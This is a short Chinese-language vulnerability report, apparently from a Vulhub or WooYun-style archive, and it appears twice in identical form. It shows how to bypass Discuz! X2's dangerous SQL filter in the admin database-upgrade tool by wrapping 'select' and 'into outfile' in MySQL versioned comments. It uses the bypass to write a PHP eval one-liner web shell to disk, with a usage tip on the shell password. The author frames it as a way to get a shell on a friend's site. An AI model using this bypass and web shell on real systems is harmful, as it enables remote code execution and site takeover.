VULHUB ™

### 简要描述： 危险语句过滤，可以绕过 ### 详细说明： 最近帮朋友看了一个站，DZx2的，拿到了创始人都没办法getshell 百度无果，自己本地架设了一下 1，当mysql是root时 站长---数据库---升级 尝试 select '1' into outfile 'E:\2.txt' 会提示 [Type] 查询语句安全威胁 [Query] select '1' into outfile 'E:\2.txt' 为什么会这样呢？ \config\config_global.php中 限制了into outfile函数 尝试绕过 /*!select*/ '1' /*!into outfile*/ 'E:\3.txt' Discuz! 数据结构升级成功，影响的记录行数 1 如果要导出一句话，即 /*!select*/ '<?php @eval($_POST[cmd]);?>' /*!into outfile*/ 'E:\3.php' 注意:一句话密码不要有引号 ### 漏洞证明： 如上

### 简要描述： 危险语句过滤，可以绕过 ### 详细说明： 最近帮朋友看了一个站，DZx2的，拿到了创始人都没办法getshell 百度无果，自己本地架设了一下 1，当mysql是root时 站长---数据库---升级 尝试 select '1' into outfile 'E:\2.txt' 会提示 [Type] 查询语句安全威胁 [Query] select '1' into outfile 'E:\2.txt' 为什么会这样呢？ \config\config_global.php中 限制了into outfile函数 尝试绕过 /*!select*/ '1' /*!into outfile*/ 'E:\3.txt' Discuz! 数据结构升级成功，影响的记录行数 1 如果要导出一句话，即 /*!select*/ '<?php @eval($_POST[cmd]);?>' /*!into outfile*/ 'E:\3.php' 注意:一句话密码不要有引号 ### 漏洞证明： 如上